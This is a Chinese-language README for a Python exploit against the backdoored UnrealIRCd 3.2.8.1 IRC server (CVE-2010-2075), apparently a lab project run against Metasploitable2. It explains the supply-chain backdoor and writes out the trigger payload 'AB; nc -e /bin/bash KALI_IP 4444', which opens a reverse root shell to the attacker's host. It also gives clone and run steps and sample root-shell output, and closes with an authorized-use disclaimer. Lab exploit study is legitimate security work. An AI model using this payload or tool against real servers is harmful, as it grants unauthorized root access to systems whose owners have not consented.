UnrealIRCd 3.2.8.1 后门漏洞利用 — 通过 AB 实现反向 shell;触发方式,使用 Python 从零构建,基于原始套接字。无需 Metasploit。
UnrealIRCd 是一款开源的 IRC(Internet Relay Chat,互联网中继聊天)服务器——一种允许用户通过网络进行实时通信的协议,类似于早期的聊天平台。
在 2009 至 2010 年间,人们发现通过官方下载镜像分发的 UnrealIRCd 3.2.8.1 已被植入后门。攻击者将合法源代码替换为包含隐藏命令执行触发器的后门版本。
这是一次供应链攻击——其性质与 CVE-2011-2523(vsftpd 2.3.4)完全相同。合法软件在用户下载之前就被替换为恶意修改的版本。
该后门会监控端口 6667 上的所有传入数据。如果任何输入以字符串 AB; 开头,其后的所有内容将被直接传递给 system()——完全绕过所有 IRC 逻辑、身份验证和注册检查。
该触发器在连接初始化阶段就会触发,甚至在 IRC 服务器注册客户端之前。无需 NICK、无需 USER、无需任何身份验证。
攻击流程:
攻击者 (Kali) 目标 (Metasploitable2)
1. s1 连接到端口 6667
NICK + USER 握手 → 服务器发送完整横幅
读取横幅,检查版本
确认 Unreal3.2.8.1
2. 在端口 4444 上打开监听器
(等待传入的 shell)
3. s2 连接到端口 6667 → AB; nc -e /bin/bash KALI_IP 4444
→ system() 立即执行
→ netcat 生成 bash,回连
4. listener.accept() ← 传入的 root shell 连接
交互式 root shell
此漏洞利用使用的是反向 shell——由目标主机回连攻击者,而非攻击者连接目标主机上的某个端口。
| 类型 | 方向 | 使用场景 |
|---|---|---|
| 绑定 Shell | 攻击者 → 目标 | CVE-2011-2523 (vsftpd) |
| 反向 Shell | 目标 → 攻击者 | CVE-2010-2075 (UnrealIRCd) |
反向 shell 可以绕过入站防火墙规则——来自目标主机的出站连接很少被阻止。
netcat(Metasploitable2 默认自带)git clone https://github.com/rushikesh-a-bhujbal/CVE-2010-2075.git
cd exploit-dev/CVE-2010-2075
编辑 main.py 并设置:
kali_ip = "YOUR_KALI_IP"
target_ip = "TARGET_IP"
运行:
python3 main.py
示例输出:
[+] Vulnerable version confirmed. Proceeding...
[*] Listening on port 4444...
[+] Shell received from ('192.168.15.132', 58280)
> whoami
root
> uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
> pwd
/etc/unreal
> exit
| 场景 | 行为 |
|---|---|
| 端口 6667 已关闭 | 打印 "Port Closed",正常退出 |
| 版本错误 | 打印 "Not vulnerable",正常退出 |
| 目标未回连 | listener.accept() 持续等待(如有需要可添加超时) |
| 命令无输出 | recv() 静默超时,返回提示符 |
| CVE-2011-2523 (vsftpd) | CVE-2010-2075 (UnrealIRCd) | |
|---|---|---|
| 协议 | FTP(端口 21) | IRC(端口 6667) |
| 触发器 | 用户名中的 :) | 任意输入以 AB; 为前缀 |
| Shell 类型 | 绑定 Shell(端口 6200) | 反向 Shell(攻击者的端口) |
| 连接数 | 2 个出站 | 1 个出站 + 1 个入站 |
此漏洞利用程序严格出于教育目的以及经授权的安全研究而开发。
仅在完全隔离的实验环境中,针对本地 Metasploitable2 虚拟机进行构建和测试。
请勿将此程序用于任何您不拥有或未获得明确书面测试许可的系统。未经授权的使用根据《计算机欺诈与滥用法案》(CFAA) 及全球同等法律均属违法行为。
作者对此代码的滥用不承担任何责任。
Rushikesh Bhujbal
安全研究与漏洞利用开发
GitHub